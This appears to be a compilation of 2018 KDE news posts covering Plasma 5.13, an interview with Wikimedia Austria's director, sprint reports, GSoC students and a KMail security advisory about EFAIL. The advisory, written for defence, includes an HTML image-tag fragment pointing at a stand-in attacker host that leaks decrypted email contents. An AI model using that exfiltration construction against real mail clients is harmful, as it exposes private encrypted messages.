If there is one document you want to read to discover what KDE has been up to and where we are right now, this is the one.
KDE's yearly report gives a comprehensive overview of all that has happened during 2017. It covers the progress we have made with KDE's Plasma desktop environment; Plasma Mobile (KDE's graphical environment for mobile devices); and applications the community creates to stimulate your productivity, creativity, education, and fun.
The report also looks at KDE's activities during 2017, giving details on the results from community sprints, conferences, and external events the KDE community has participated in worldwide. It also covers what is probably the most important community milestone of 2017: defining and agreeing on what are the most important global goals, goals that will direct the efforts of KDE community members for years to come.
You can also find out about the inner workings of KDE e.V., the foundation that legally represents the community. Check KDE's financial status and read up about the KDE e.V. board members, the different working groups, the Advisory Board, and how they all work together to keep KDE moving forward.
Optimized and less resource-hungry, Plasma 5.13 can run smoothly on under-powered ARM laptops, high-end gaming PCs, and everything in between.
Feature-wise, Plasma 5.13 comes with Browser Integration. This means both Chrome/Chromium and Firefox web browsers can be monitored and controlled using your desktop widgets. For example, downloads are displayed in the Plasma notification popup, so even if your browser is minimized or not visible, you can monitor the download progress. Likewise with media playing in a tab: you can use Plasma's media controls to stop, pause and silence videos and audio playing in any tab – even the hidden ones. This a perfect solution for those annoying videos that auto-start without your permission. Another Plasma-browser feature is that links can now be opened from Plasma's overhead launcher (Krunner), and you can also send links directly to your phone using KDE Connect.
Talking of KDE Connect, the Media Control Widget has been redesigned and its support of the MPRIS specification has been much improved. This means more media players can now be controlled from the media controls in the desktop tray or from your phone using KDE Connect.
Plasma 5.13 is also visually more appealing. The redesigned pages in 5.13 include theming tools for desktops, icons and cursors, and you can download new splash screens from the KDE Store directly from the splash screen page. The desktop provides a new and efficient blur effect that can be used for widgets, the dashboard menu and even the terminal window, giving them an elegant and modern look. Another eye-catching feature is that the login and lock screens now display the wallpaper of the current Plasma release, and the lock screen incorporates a slick fade-to-blur transition to show the controls, allowing it to be easily used as a screensaver.
Discover, Plasma's graphical software manager, improves the user experience with list and category pages that replace header images with interactive toolbars. You can sort lists, and they also show star ratings of applications. App pages and app icons use your local icon theme to better match your desktop settings.
Vaults, Plasma's storage encryption utility, includes a new CryFS backend, better error reporting, a more polished interface, and the ability to remotely open and close vaults via KDE Connect.
Connecting to external monitors has become much more user-friendly. Now, when you plug in a new external monitor, a dialog pops up an lets you easily control the position of the additional monitor in correlation to your primary one.
Claudia graciously met up with us (Ivana and Paul) to tell us all about her job, how the Wikipedia community works and the challenges it faces.
This is what she told us:
Paul: Welcome, Claudia, and thank you for joining us!
Claudia: Thanks for having me :-)
Ivana: Hello Claudia!
Paul: So you are the Executive Director of Wikimedia Foundation Austria, correct?
Claudia: Correct. Since 2012. It's actually called "Wikimedia Österreich". The Foundation is only the organization in San Francisco
Paul: Thanks for the clarification. Tell us... What led you to this job? Did you do something similar before?
Claudia: I used to work as Head of Marketing and Communication for a major applied science organization in Germany. We were pioneers in the field of online science communication in the German-speaking world. Beyond the focus on online communication, I think the common denominator of those two jobs is making knowledge accessible.
Paul: Of course. What does a typical day at Wikimedia look like for you? What do you do there?
Claudia: I'm not sure I have a typical day. We work closely with volunteers, so our working hours vary. We often work in the evenings or on weekends when our Wikimedians are available. I also not only work from our office, but frequently remote when I travel for work.
Paul: So do you oversee their work? Make sure the rules for editing articles are respected? Organize events? All of the above?
Claudia: Wikimedia staff does not intervene into the work on the Wikimedia projects. The community decides about the rules and how to enforce them; we do not have any direct influence there.
But the task that follows me everywhere and at any time is to secure funds for our organization, i.e. fundraising, grant-making and reporting. Apart from that, one of my main tasks is to build partnerships within the Wikimedia movement, but also beyond. With like-minded communities, cultural institutions, potential donators, and so on.
Ivana: I take it that you face the challenge of working with people from different time zones. Could you share some advice or tools that you use to overcome scheduling issues?
Claudia: I don't think we have super-innovative approaches in that regard. For us in Austria, it's mainly Europe and the US so far, and we found the time slots that work for most. I think the Wikimedia Foundation has probably more refined ideas, as they work with a more diverse group, but I wouldn't know the details.
Paul: Talking of diverse, I understand you also deal with diversity and inclusion issues. How do you promote these two things?
Claudia: Due to our "hands off" approach, we can only deal with diversity and inclusion issues indirectly: by raising awareness for the topic, encouraging mentorship, fostering solidarity networks among volunteers, and providing incentives and support for all of that. One example is the mentoring program we developed for the Wikimedia Hackathon last year. We wanted to create a welcoming atmosphere for newcomers that is reflected in the physical space, as well as in the social interactions.
Paul: Is there a lack of diversity within the Wikipedian community?
Claudia: It always depends on the definition of diversity, and it varies between our communities. Speaking for our Austrian communities: it is diverse in some regards, like age, and not very diverse in other, such as gender or ethnical background.
Paul: So do you know what percentage of women Wikipedians versus men there are, for example? The percentage for each ethnicity? Is this information you collect?
Claudia: There are roughly 10% female contributors in the German-language Wikipedia, and that reflects what I see during offline events. Non-binary is probably around 1-2%. But the numbers are not all 100% accurate, as many volunteers choose not to disclose their gender, and we respect their wish for anonymity. That is even more true for ethnicity - we do not ask for that anywhere. This is what you can get from the information people provide on their user pages. Apart from that, we do not collect any personal data.
But there are other ways to make the diversity gaps visible: by comparing the number of biographies about females to the number of articles about men. Wikidata makes that really easy nowadays. Or by looking at the language and perspectives that are represented in articles. It becomes obvious very quickly that we have a problem there, and that should be fixed if we strive to collect "the sum of all human knowledge" as our vision statement says.
Paul: How do you solve this problem? Getting back to the activity you mentioned before, for example - how do you make a hackathon more welcoming? What do you physically do?
Claudia: For the first time we had mentors at such an event. Their only job was to help newcomers and to pair them with other newcomers according to common interests. Usually the mentors had project ideas that were suitable for newbies to get started. The aim was that every newcomer could be part of a team that accomplished something during the weekend, and to be able to present a project at the showcase on the last day.
To make it as easy as possible to approach people, we also had a mentoring area where people could come at any time to ask questions or get help. Our Austrian community held pre-events, so people could get to know each other in smaller, more intimate surroundings before they were thrown into an international event with 250 strangers. Finally, we had an outreach coordinator who facilitated the mentor-to-mentor and mentor-to-mentees exchange before, during, and after the event.
Other ways to make event spaces inclusive are gender-neutral bathrooms, designated "quiet zones" where people can retreat to when they need a break from social interaction, stickers to customize your name badge with information about yourself that can also include how you want to be addressed in terms of gender, etc.
Many of these ideas were adapted from a youth hack event called "Jugend Hackt" that is a project of Open Knowledge in Germany and Austria.
Ivana: It sounds like you're really taking care of new contributors, which is awesome! It's something we're trying to be better at in our community, too. Could you tell us a bit about the onboarding process - what does it look like when someone new wants to join and start contributing? Are there any "best practices" or recommended ways to get started?
Claudia: We learned that the best way to onboard newcomers is regularity; it's hard to achieve much with a single event. So having mentors beyond the event helps, or having regular events or follow-up events, where people can come back to when they encounter barriers. It can be further assisted with social media - chat groups and the like. Places where people can find help and advice on short notice online.
Ivana: Have you had any students or new contributors join Wikimedia Österreich through mentorship projects like Outreachy, Google Summer of Code or similar? Do you organize similar programs on a local scale, i.e. in the German-speaking communities?
Claudia: We have had newcomers join via local mentoring programs, but not via the global programs you mentioned.
Ivana: Do you have something like a list of "junior jobs" or easy tasks that newcomers can immediately tackle? Or if you've tried a similar approach in the past, can you tell us how that worked?
Claudia: We tried the easy task list for the Wikimedia Hackathon last year. The list was linked from the event page so people could check it out beforehand. Apart from that, there were also other tasks to help around the event that were not related to coding: writing blog posts, making a podcast, taking pictures, helping the organizers on site...
Ivana: Getting back to the topic of helping newcomers, you mentioned potential barriers they can encounter. In your experience, what are the most common barriers, or obstacles that newcomers have reported? And how have you worked on resolving them?
Claudia: I think for most newcomers the hardest part is to see where they could help and how. So the task list and mentors can help with that. However, we also still have room for improvement: After the hackathon, many newcomers complained about how long it took to get a code review. Often keeping people engaged after an event is the hardest part. For newcomers and mentors alike.
In the end, it is a question of resources. If we want new people, and especially underrepresented people, we will have to invest resources into this endeavour. Half-assed approaches usually don't work in the long run, and I'm afraid that this is something we still have to internalize as a movement.
Paul: What about problems from the old-timers? Is there any resistance from the existing community towards the effort to promote more diversity?
Claudia: Of course there are parts of the community who are indifferent, and some who openly work against such topics. So the art is to find the people who support the idea and include them, to address justified concerns, and ignore, or if there is no other way, get rid of people that display toxic behavior.
Paul: What sort of problems do you see a lack of diversity causing?
Claudia: For Wikipedia it is clear: the sum of all knowledge can not be gathered and represented by a small homogeneous group. Furthermore, quality and objectivity of knowledge are also important values in our movement that can only be achieved by including diverse perspectives.
Paul: For somebody who wanted to join in the Wikipedia effort... What advice would you give them? What should they read? Where can they start?
Claudia: Most Wikipedias have extensive guides on how to get started. Too extensive sometimes :-). I would see whether there is a mentoring program on your Wiki project and sign up, or whether there are local Wiki meet-ups in your home town. In Vienna, for example, we have a Wikipedia clinic for newcomers every first Tuesday of the month.
Paul: A Wikipedia clinic! What do you do there?
Claudia: It's basically where you can come to discuss and find help for common problems. I think there are code clinics at some events too. It's a peer approach to exchange best practices around common issues or challenges.
Paul: Is there a trend? Like problems that new contributors come up with again and again? If so, what are they?
Claudia: I think the challenges for newcomers vary between the projects. In the German language Wikipedia, the biggest issues are certainly the complexity that results from an elaborate rule set to ensure quality of content; the fact that most topics of general knowledge are fairly well covered so you need to find your expert niche to contribute; and the often not very newcomer-friendly atmosphere and aggressive interactions.
Paul: I suppose people feel possessive about what they work on. Is there any sort of regulatory body that helps resolve disputes or reprimands antisocial behavior?
Claudia: There are community-elected arbitration committees to solve conflicts on projects. But in some cases, especially when there is also offline harassment involved, the Wikimedia Foundation has to take steps to ban those people from events, the projects, or both in order to protect others.
Paul: I guess it is normal that in such a big community you will have all sorts of people...
Moving on to happier topics. Apart from actually writing or expanding Wikipedia articles, what are other things contributors can do to help Wikipedia grow and thrive?
Claudia: Other ways to contribute to Wikipedia are to help build the software behind MediaWiki, or to take freely licensed pictures for Wikipedia & Co and upload them to Wikimedia Commons. There are also all the other sister projects such as Wikivoyage, Wiktionary, or Wikidata.
Paul: I guess donations also help, right? Where can we go and donate?
Ivana: And we look forward to your keynote at Akademy!
Claudia: Thanks! Looking forward to meeting you in person!
Claudia will be delivering the keynote at Akademy 2018 on the 12th of August. Come to Akademy and find out live how you too can make your community more diverse and inclusive.
For most of the year, KDE -- one of the largest free and open software communities in the world-- works on-line by email, IRC, forums and mailing lists. Akademy provides all KDE contributors the opportunity to meet in person to foster social bonds, work on concrete technology issues, consider new ideas, and reinforce the innovative, dynamic culture of KDE. Akademy brings together artists, designers, developers, translators, users, writers, sponsors and many other types of KDE contributors to celebrate the achievements of the past year and help determine the direction for the next year. Hands-on sessions offer the opportunity for intense work bringing those plans to reality. The KDE Community welcomes companies building on KDE technology, and those that are looking for opportunities.
Between the 23rd and 25th of March, KDE Connect developers gathered in Verse's offices in Barcelona to work together for a weekend. It was the first meeting KDE Connect had in a while, and it was very productive!
It's been some time since the sprint, and the work carried out there has already started to trickle down into our devices. Nevertheless, we wanted to shed some light on our accomplishments, and encourage everyone to participate.
Holding discussions and making decisions is much easier in person. We kicked off the sprint by going through our backlog of ideas to decide what was worth implementing. That helped us set the focus for the sprint and resume some blocked tasks.
One of the most requested features for KDE Connect is the ability to send SMS from the desktop. We already supported SMS to a certain degree with the ability to reply to a message. Some people have even set up Kontact to be able to send texts using KDE Connect from there, but it can be annoying to use without conversation history. During the sprint, Simon and Aleix started working on a fully-featured interface for sending SMS easily from the desktop that includes full conversation views and a full contact list.
Aleix and Nico polished the Run Commands interface to make it more discoverable, so that we can easily configure KDE Connect to do anything we want.
Matthijs improved the functionality of multimedia controls - now it's possible to display the album art from your desktop on your Android devices (both on the lock screen and in the new multimedia notification). Meanwhile, Aleix and Nico started paving the way towards better integration with PulseAudio control, sharing some code between KDE Connect and the Plasma volume control.
A less visible but crucial part of what makes KDE Connect so useful is its integration with the system. Albert Vaca worked on a KDE Connect plugin for Nautilus, so people who don't use Plasma and Dolphin can also have a great user experience.
Another very important but often-overlooked task is documentation. Matthijs invested some time in improving the onboarding process for new contributors. Hopefully we'll get more people involved in the future!
Last but not least, we fixed some ugly bugs during this sprint. Albert Astals fixed a long-standing crash in KIO, the KDE Framework used by KDE Connect for transferring files. Simon and Albert Vaca took care of some compatibility problems with Android Oreo, while Matthijs fixed a connectivity issue and even made some progress on Bluetooth support.
All in all, the sprint was a pleasant event, and I'm really happy we all got together. It was nice to meet the developers working on KDE Connect, to connect faces with nicknames, and generally agree on a common path we will follow in future development.
Big thanks to KDE e.V. for sponsoring the travel - without their help, this sprint wouldn't have been possible.
February was a big month for the Promo team - we held a long-awaited sprint in Barcelona, Spain from the 16th to 18th. The aim of the sprint was to look at information we had collected over the prior years, interpret what it meant, and use it to discuss and plan for the future. The activities we came up with should help us accomplish our ultimate goal: increasing KDE's visibility and user base.
Nine members of the team made it to Barcelona: Aleix Pol, Ivana Isadora Devčić, Jure Repinc, Kenny, Łukasz Sawicki, Lydia Pintscher, Neofytos Kolokotronis, Paul Brown, and Rubén Gómez. We met at Espai 30, an old factory converted into a social center for the neighborhood. Coincidentally, that is one of the places where the Guifi.net project started -- rather fitting for a meeting that comprised Free Software and communication.
Day 1: Informal Afternoon Meeting
Although Friday was "arrival day" without an official agenda, we could not resist talking shop over pizza and beer. Discussions gravitated towards the KDE.org website, which will be migrated from an old and clunky backend to a Wordpress framework. The improvement to the framework got us thinking on how we could improve the content, too.
The consensus was that we want to inform the general public about what KDE is - not a desktop, but the community that creates, maintains, documents, translates, and promotes a large body of multi-purpose software. Our software collection does include a desktop environment, but it also offers utilities, games, productivity applications, media players and editors, an environment and applications for mobile phones, development frameworks, and much more.
We should also make sure the website caters equally to the tech savvy and unsavvy, since KDE's software is meant for everybody. The new site should clearly direct users to our products, allowing end users to simply download and use them. At the same time, the website should ease the way for potential contributors to join the community.
Day 2: Espai 30, Stats stats stats, and Improved Communication
At the break of dawn the next day... well, actually, at 10 o'clock, sprint sessions started in earnest. Ivana gave a recap of Promo's main activities over the last year or so, revisiting funding campaigns we promoted and communication tactics we implemented.
Next we looked at hard, cold data, collected from social media accounts, web statistics, and distro popcons (application popularity contests). The bad news is that visits to our main sites have gone down over the last year. The good news, however, is that followers and interactions on social media have seen a significant increase. Although data collected from popcons are partial, it also looks like Plasma's user base is growing steadily.
Want to help us with data-collecting and processing, or have ideas about where we can collect more useful information? Send your suggestions to our mailing list and we'll look into it.
The data also helps us pinpoint wins and fails in our approach to communicating with the outside world. We found a direct relation between the traffic to our news site (dot.kde.org) and to the main kde.org website. Therefore it makes sense to seriously work on increasing the traffic to kde.org first, in order to improve the visibility and effectiveness of our announcements and campaigns. We also identified ways to make our social media posts more attractive, which should help them garner more re-tweets, boosts (the equivalent of re-tweets in Mastodon), shares and upvotes, and spread our messages further.
Another way of reaching more people is through events. We discussed Akademy and our plans for promoting the 2018 edition before and during the event, so that news coming out of Vienna in August can reach as many people as possible.
We also talked about visiting other technical and even not-so-technical events. By showcasing our applications and letting users play with them, we think we will be able to increase our user base. In any case, we need to be well-prepared for all types of conferences, so we made a list of essentials based on our previous experiences.
We noticed that even within the FLOSS community, there is a large portion of businesses, organizations and developers who are unaware of technologies that KDE develops. Speaking and setting up booths at technical, but non-KDE/Qt events (like the upcoming Embedded Linux Conference organized by the Linux Foundation), could help solve this problem and even attract contributors for KDE.
Do you have suggestions for events we should attend? Join the Attend External Events task and tell us about them.
One of the things we have started doing, for example, is creating a list of simple tasks for beginners. We are also trying to identify where people struggle in the process of joining Promo, and working on eliminating obstacles. On a more one-to-one basis, we want to be able to identify people's skills so we can direct them to teams they can join. This was one of the topics we tackled during the last day of the sprint.
Day 3: Teams, Market Research, and Publicity Stunts
For example, we'd like to have a smoother communication channel with developers, so that we can better understand their work and advise them on how to promote it. The best way to do this, we thought, would be to recruit developers already in the Promo group as liaisons with their colleagues.
Likewise, experienced YouTubers and videographers can create promotional videos for product releases; journalists and editors can write or help improve blog posts and news articles; and people with a background in marketing can use their knowledge to do some serious market research.
That last thing is important because the Promo team must discover what technologies people use, how they use them, and what they like and dislike about them to be able to market KDE products. We decided to take a step back and work on a market research project that will provide us with solid information on which to base our actions.
At the same time, we can entice people to use Plasma and KDE applications with straightforward advertising, or rely on the more subtle art of product placement. Regarding the former, we looked at publicity stunts that had helped other community projects in the past, like full page ads in prominent newspapers, or messages on public transport. For example, ads at bus stops in university areas may help encourage students join the community.
Got an idea for advertising campaign which is both effective and cheap to carry out? Share it with us!
As for the latter, it turns out that TV shows and movies sometimes have a hard time when they want to show a flashy computer or mobile device interface. Because they can be endlessly customized, Plasma, Plasma Mobile and the applications that run on them are perfect candidates for the likes of The Blacklist, CSI Cyber, Mission Impossible 7... Okay, maybe we will have to start more modest, but remember that KDE tech was already featured on Mr Robot, albeit as the choice of the villain.
Do you know somebody with a solid audience on the fringes of open sourcedom that could influence a large group of people? Go and add them to the list.
We also want to improve our presence in businesses. To do that, we would first have to approach businesses and contractors that already work with KDE/Qt-based technologies. The idea is to get them on board and create a marketplace/support network that other companies can rely on when considering a migration to desktop Linux.
While brainstorming other ways to increase awareness, we realized we could improve videos and help them reach a wider audience by adding subtitles. If you would like to help creating subtitles in your language, sign up for the video group and tell us what you can do.
This was an intense and intensive sprint. The full list of topics we discussed is longer than this report, but we managed to devote enough time to the most pressing issues. We came up with ideas for targets and ways to work towards them that will translate into real results. We are now progressively implementing tasks that will help us reach those targets, but we need your help.
If you think you can help us achieve our goals, please join the Promo group. We have a mailing list, IRC channel, and a Telegram group. You can also take a look at our workboard and leave your feedback on tasks that are in progress.
Developing KDE's software is super-important, but so is spreading the message that the software exists and that everybody, regardless of their level of computer-literacy, can and should use it. That is what the Promo team is all about, and we will keep practicing what we preach.
Thursday, 17 May 2018. Today KDE unveils a beta release of Plasma 5.13.0.
Members of the Plasma team have been working hard to continue making Plasma a lightweight and responsive desktop which loads and runs quickly, but remains full-featured with a polished look and feel. We have spent the last four months optimising startup and minimising memory usage, yielding faster time-to-desktop, better runtime performance and less memory consumption. Basic features like panel popups were optimised to make sure they run smoothly even on the lowest-end hardware. Our design teams have not rested either, producing beautiful new integrated lock and login screen graphics.
KDE Student Programs is happy to present our 2018 Google Summer of Code students to the KDE Community.
Welcome Abhijeet Sharma, Aman Kumar Gupta, Amit Sagtani, Andrey Cygankov, Andrey Kamakin, Anmol Gautam, Caio Jordão de Lima Carvalho, Chinmoy Ranjan Pradhan, Csaba Kertesz, Demetrio Carrara, Dileep Sankhla, Ferencz Kovács, Furkan Tokac, Gun Park, Iván Yossi Santa María González, Kavinda Pitiduwa Gamage, Mahesh S Nair, Tarek Talaat, Thanh Trung Dinh, Yihang Zhou, and Yingjie Liu!
This year digiKam, KDE's professional photo management application, has three students: Tarek Talaat will be working on supporting Twitter and One Drive services in digiKam export, Thanh Trung Dinh on Web Services tools authentication with OAuth2, and Yingjie Liu on adding the possibility to manually sort the digiKam icon view.
Plasma, KDE's graphical desktop environment, will also be mentoring three students. Abhijeet Sharma will be working on fwupd integration with Discover (KDE's graphical software manager), Furkan Tokac will improve handling for touchpads and mice with Libinput, and Gun Park will port keyboard input modules to Qt Quick and expand scope to cover input method configuration for System Settings.
Another project with three students is Krita, KDE's popular graphic editor and painting application. Andrey Kamakin will improve multithreading in Krita's Tile Manager; Iván Yossi Santa María González (ivanyossi) will optimize Krita Soft, Gaussian and Stamp brushes mask generation to use AVX with Vc Library; and Yihang Zhou (Michael Zhou) is creating a Swatches Docker for Krita.
GCompris, the suite of educational programs and games for young learners, takes two students: Aman Kumar Gupta will port all GTK+ piano activities and get it one step closer to version 1.0, and Amit Sagtani will work on creating bitmap drawing and animation activities while preparing Gcompris for version 1.0.
Labplot, KDE's application for scientific data plotting and analysis, also mentors two students. Andrey Cygankov will add support for import data from web-service in LabPlot, and Ferencz Kovács will be working on plotting of live MQTT data.
Okular, KDE's PDF and document viewer, gets another two students: Chinmoy Ranjan Pradhan will be working on verifying signatures of PDF files, while Dileep Sankhla will implement the FreeText annotation with FreeTextTypeWriter behavior.
Csaba Kertesz (kecsap) will aim to improve the desktop and the Android version of KStars, KDE's planetarium program, while Kavinda Pitiduwa Gamage will work on KGpg, KDE's graphical key management application, to make it better.
Mahesh S. Nair will expand Peruse Creator, adding more features to KDE's easy-to-use comic book reader. Finally, Demetrio Carrara will be working on the WikitoLearn production-ready Progressive Webapp (PWA).
Traditionally, Google Summer of Code starts with an introduction period where students get to know their mentors, after which they start coding. The coding period for 2018 has began on May 14, and will last until August 6. We wish all our students a productive, successful, and fun summer!
On Monday, a security vulnerability in the OpenPGP and S/MIME email encryption standards and the email clients using those, called EFAIL was published.
What is this about and how is KMail affected? (Spoiler: KMail users are safe by default.)
The discovered vulnerability affects the OpenPGP and S/MIME standards used for end-to-end encryption of emails that specifically encrypts emails for the intended receivers. This is not to be confused with transport encryption (typically TLS) that is used universally when communicating with an email server. Users not using OpenPGP and S/MIME are not affected by this vulnerability.
End-to-end encryption is usually employed to prevent anyone different from the intended receiver from accessing message content, even if they somehow manage to intercept or accidentally receive an email. The EFAIL attack does not attempt
to break that encryption itself. Instead, it applies some clever techniques to trick the intended receiver into decrypting the message, and then sending the clear text content back to the attacker.
KMail relies on GnuPG for the OpenPGP and S/MIME handling, so you might also be interested in the GnuPG team's statement on EFAIL.
The EFAIL research paper proposes several exfiltration channels for returning the clear text content. The easiest one to understand is by exploiting the HTML capabilities of email clients. If not properly controlled, HTML email messages can download external resources, such as images, while displaying an email - a feature often used in corporate environments.
Considerably simplified, the idea is to add additional encrypted content around an intercepted encrypted message. The whole procedure for doing this is quite elaborate and explained in depth in the paper. Let's assume an attacker manages to prefix an intercepted encrypted email with the (encrypted) string "<img src='http://my.site/?" and append an extra "'/>". The result would look something like this, after decryption by the receiver:
An email client that unconditionally retrieves content from the Internet while displaying HTML emails would now leak the email content as part of an HTTP GET request to an attacker controlled web server - game over.
The OpenPGP standard has a built-in detection mechanism for manipulations of the encrypted content. This provides effective protection against this attack. KMail, or rather the GnuPG stack KMail uses for email cryptography, does make use of this correctly. Not all email clients tested by the EFAIL authors seem to do this correctly, though. Notwithstanding, your OpenPGP encrypted emails are safe from this attack if you use KMail.
The situation with S/MIME is more difficult, as S/MIME itself does not have any integrity protection for the encrypted content, leaving email clients with no way to detect the EFAIL attack. That's a conceptual weakness of S/MIME that can only really be fixed by moving to an improved standard.
Fortunately, this does not mean that your S/MIME encrypted emails cannot be protected in KMail. By default, KMail does not retrieve external content for HTML emails. It only does that if you either explicitly trigger this for an individual email by clicking the red warning box at the top of emails which informs of external content, or if you enable this unconditionally via Settings > Configure KMail > Security > Reading > Allow messages to load external references from the Internet. Starting with version 18.04.01, the latter setting will be ignored for S/MIME encrypted content as an additional precaution. For older versions, we recommend you make sure this setting is disabled.
Furthermore, distribution maintainers can get patches to solve this problem from here:
In order to revoke compromised signing keys, S/MIME relies on certificate revocation lists (CRLs) or the online certificate status protocol (OCSP). These two mechanisms consult an online server defined by the authority managing the
respective keys. The EFAIL paper suggests that this might be another possible exfiltration channel, as well as HTML. However, this hasn't been demonstrated yet, and the GnuPG team thinks it is unlikely to work. It is also a relevant piece
of the S/MIME security model, so simply disabling this as a precaution has security implications, too.
Therefore, we have not changed the default settings for this in KMail at this point. The reason is because compromised and thus revoked keys seem to be the more common concern than an elaborate targeted attack that would employ CRL or OCSP as an exfiltration channel (if possible at all). You'll find the corresponding settings for the CRL and OCSP usage under Settings > Configure KMail > Security > S/MIME Validation should you want to review or change them.
Research in email client and email cryptography security is very much appreciated and badly needed, considering how prevalent email is in our daily communication. As the results show, S/MIME is showing its age and is in need of conceptual improvements. Also, EFAIL again highlights the dangers to privacy caused by HTML emails with external references. Most importantly, this shows that your emails are well-protected by KMail and GnuPG, and there is certainly no reason to panic and stop using email encryption.
That said, it's not too early to start planning for Akademy 2019!
In fact, we are now opening the Akademy 2019 Call for Hosts, and looking for a vibrant spot and an enthusiastic crew that will host us.
Would you like to bring Akademy, the biggest KDE event, to your country? Read on to find out how to apply!
A Bit About Akademy
Akademy is KDE's annual get-together where our creativity, productivity and community-bonding reach their peak. Developers, users, translators, students, artists, writers - pretty much anyone who has been involved with KDE - will join Akademy to participate and learn. Contents will range from keynote speeches and two days of dual track talks by the FOSS community, to workshops and Birds of a Feather (BoF) sessions where we plot the future of the project.
The first day serves as a welcoming event. The next two days cover the keynote speakers and other talks. The remaining days are used for BoF sessions, intensive coding and workshops for smaller groups of 10 to 30 people. One of the workshop days is reserved for a day trip, so the attendees can see the local tourist attractions.
What You Get as a Host
Hosting Akademy is a great way to contribute to a movement of global collaboration. You get a chance to host one of the world's largest FOSS communities with contributors from across the globe, and witness a wonderful week of intercultural collaboration in your home town.
You'll get significant exposure to the Free Software community, and develop an understanding of how large projects operate. It is a great opportunity for the local university students, professors, technology enthusiasts and professionals to try their hand at something new.
What We Need from a Host
Akademy requires a location close to an international airport, with an appropriate conference venue that is easy to reach. Organizing Akademy is a demanding task, but you’ll be guided along the entire process by people who’ve been doing it for years. Nevertheless, the local team should be prepared to invest a considerable amount of time into organizing Akademy.
During the sprint, the Plasma team was joined by guests from Qt and Sway WM. Discussion topics included sharing Wayland protocols, input methods, Plasma Browser Integration, tablet mode for Plasma's shell, porting KControl modules to QtQuick, and last but not least, the best beer in Berlin.
Constructive Discussions with SwayWM - Check!
The effort to port Plasma to work on Wayland rather than X continues at a fast pace. Wayland protocols define how applications interact with the display, including tasks essential to Plasma such as declaring which "window" is really a panel. These protocols have to be defined by the Plasma team and preferably standardized with other users of the Linux desktop.
One newcomer to the field is SwayWM - a Wayland version of the i3 window manager. Drew DeVault, the lead developer of the project, joined our Plasma sprint to discuss where Wayland procotols could be shared. The team looked at their Layer Protocol, which covers much of the work of the current plasmashell protocol. We found that this protocol contains some nice ideas and suggested some improvements for the SwayWM developers.
The Plasma Output Management Protocol was also discussed. This protocol defines how external monitors are used, and Sway currently just reloads configuration files as needed. The team will consider this solution if the need for such a protocol arises. Protocols for Remote Access were compared and reviewed along with Pipewire as systems for managing audio and video. Drew wrote a blog post with more information on this topic.
Exciting Collaboration with Qt - Check!
Shawn Rutledge, the lead developer of Qt's new input stack, also joined us for a few days of the sprint. Together, we reviewed the new API and looked at how some of the unique use-cases of Plasma would work with it. The conclusion was that "some parts, including complex drag-and-drop actions, went surprisingly smoothly".
A bunch of design changes were suggested and improvements submitted. Working with Qt developers at this early stage is a great win for both projects, as it saves KDE developers a lot of time when they come to use the new features, while the Qt world gets a nicer result.
Improved Plasma Browser Integration - Check!
Plasma Browser Integration is a fun new feature that will be shipped with Plasma 5.13 next month.
It means Firefox and Chrome/Chromium will use Plasma's file transfer widget for downloads and native Plasma notifications for browser notifications. Moreover, media controls will work with the task manager.
The browser extensions were tidied up, translations fixed, and accounts on the relevant browser store websites set up. Another decision made at the sprint was that we have a collective duty to make sure KDE's new web browser Falkon is at feature-parity in terms of Plasma integration.
Plasma on Pinebook and Tablet Mode - Check!
The team continued to work on convergence with other form factors - in other words, on making Plasma run seamlessly on a variety of devices, both desktop and mobile. Bhushan worked on Plasma Mobile images for devices which supports upstream kernel, which is essential for security and more up-to-date system on mobile devices.
Rohan worked on making Plasma run smoothly and with all Free drivers on the low-end Pinebook laptop. This goes to show that Plasma can function as a lightweight desktop environment without losing the features.
Lastly, Marco managed to get Plasma working on a convertible laptop with support for switching into tablet mode, illustrating how we can actively shift between form factors.
Talks, Burritos, and Beer - Check!
Throughout the week, we also gave talks to our host company Endocode who kindly lent us their central Berlin offices, complete with a fridge full of alcohol-free beer.